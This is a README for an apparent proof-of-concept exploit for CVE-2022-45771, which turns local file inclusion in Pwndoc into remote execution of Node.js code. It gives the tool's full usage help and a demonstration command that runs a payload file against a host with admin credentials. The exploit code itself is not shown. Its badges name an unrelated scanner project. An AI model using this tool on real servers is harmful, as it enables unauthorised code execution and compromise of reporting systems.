Share
## https://sploitus.com/exploit?id=F491282A-3C7F-5B95-92AB-D5450AC75941
# CVE-2022-45771 - Pwndoc LFI to RCE

<p align="center">
  Pwndoc local file inclusion to remote code execution of Node.js code on the server, discovered by <a href="https://github.com/yuriisanin">@yuriisanin</a>
  <br>
  <img alt="PyPI" src="https://img.shields.io/pypi/v/apachetomcatscanner">
  <img alt="GitHub release (latest by date)" src="https://img.shields.io/github/v/release/p0dalirius/ApacheTomcatScanner">
  <img alt="Python pip build" src="https://github.com/p0dalirius/ApacheTomcatScanner/actions/workflows/python-pip-build.yml/badge.svg">
  <a href="https://twitter.com/intent/follow?screen_name=podalirius_" title="Follow"><img src="https://img.shields.io/twitter/follow/podalirius_?label=Podalirius&style=social"></a>
  <a href="https://www.youtube.com/c/Podalirius_?sub_confirmation=1" title="Subscribe"><img alt="YouTube Channel Subscribers" src="https://img.shields.io/youtube/channel/subscribers/UCF_x5O7CSfr82AfNVTKOv_A?style=social"></a>
  <br>
</p>


## Features

 - [x] Custom Node.js code to execute server-side using `--payload-file`
 - [x] Cleanup after exploit

## Requirements

 - [x] An admin account on the PwnDoc instance

## Usage

```
$ ./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -h
CVE-2022-45771 Pwndoc-LFI-to-RCE v1.1 - by @podalirius_

usage: CVE-2022-45771-Pwndoc-LFI-to-RCE.py [-h] -u USERNAME -p PASSWORD -H HOST [-P PORT] [-v] [--http] [-f PAYLOAD_FILE]

Poc of CVE-2022-45771 Pwndoc-LFI-to-RCE

options:
  -h, --help            show this help message and exit
  -u USERNAME, --username USERNAME
                        Pwndoc username
  -p PASSWORD, --password PASSWORD
                        Pwndoc password
  -H HOST, --host HOST  Pwndoc ip
  -P PORT, --port PORT  Pwndoc port
  -v, --verbose         Verbose mode. (default: False)
  --http                HTTP mode. (default: False)
  -f PAYLOAD_FILE, --payload-file PAYLOAD_FILE
                        File containing node.js code to run on the server.
```

## Demonstration

```
./CVE-2022-45771-Pwndoc-LFI-to-RCE.py -u admin -p 'Admin123!' --host 127.0.0.1 --payload-file files/exploit.js
```

https://user-images.githubusercontent.com/79218792/207442497-3228c436-5755-4a9a-9931-b23402dc9e86.mp4

## References
 - Issue https://github.com/pwndoc/pwndoc/issues/401 by [@yuriisanin](https://github.com/yuriisanin)
 - https://www.youtube.com/watch?v=jffBkEdF7RY